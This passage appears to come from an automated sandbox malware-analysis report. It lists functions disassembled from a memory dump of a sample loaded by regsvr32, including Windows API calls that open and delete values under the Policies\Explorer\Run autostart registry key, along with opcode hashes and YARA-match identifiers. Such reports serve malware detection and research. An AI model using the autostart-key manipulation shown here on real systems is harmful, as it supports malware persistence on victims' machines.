                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,02A0D4CE,00000000,?,00000000), ref: 02A13A31
                                      • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 02A13A45
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02A13A2F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteOpenValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 2654517830-1051519024
                                      • Opcode ID: fd2d353d7db052f18818bf6a123a5391dfaa65b4b4e762d02656e960b4c85627
                                      • Instruction ID: 78954b413e973ca8665d63fd4646b5860550c7990ab6e0a03f48b45d04190559
                                      • Opcode Fuzzy Hash: fd2d353d7db052f18818bf6a123a5391dfaa65b4b4e762d02656e960b4c85627
                                      • Instruction Fuzzy Hash: 49E0C27168421CFBDF104F71DC06FBB376CDB01B11F000AD4BA0696080CF22DA1596A0
                                      Function 02A40C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02A01D55), ref: 02A40D27
                                      • GetLastError.KERNEL32 ref: 02A40D35
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02A40D90
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: f66ef1c6082cb9c52806381202364b2961f73c4d2a8d81bf5075a056cd404cba
                                      • Instruction ID: e92a2bec5074beeb9f067e853e2de59882f288f810fad61ecf26957549d59b37
                                      • Opcode Fuzzy Hash: f66ef1c6082cb9c52806381202364b2961f73c4d2a8d81bf5075a056cd404cba
                                      • Instruction Fuzzy Hash: B341F835600316EFCF298F75C8847AA7BB5EF81324F148159FA549B290DF32E905EB90
                                      Function 02A11B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02A11B8C
                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02A11C58
                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A11C7A
                                      • SetLastError.KERNEL32(0000007E,02A11EF0), ref: 02A11C91
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRead
                                      • String ID:
                                      • API String ID: 4100373531-0
                                      • Opcode ID: 25cab3e34dc99b917197624f8e335964a5601ac9fe629dedb1342091636aaf88
                                      • Instruction ID: cef672c22beee45e1ff8155f99ff8523da8498c36b4fceaeabc640235a2630b4
                                      • Opcode Fuzzy Hash: 25cab3e34dc99b917197624f8e335964a5601ac9fe629dedb1342091636aaf88
                                      • Instruction Fuzzy Hash: 22417975604306DFEB248F19DD84B66B7E9FF48724F00082DEA8ACB651EB31E905DB51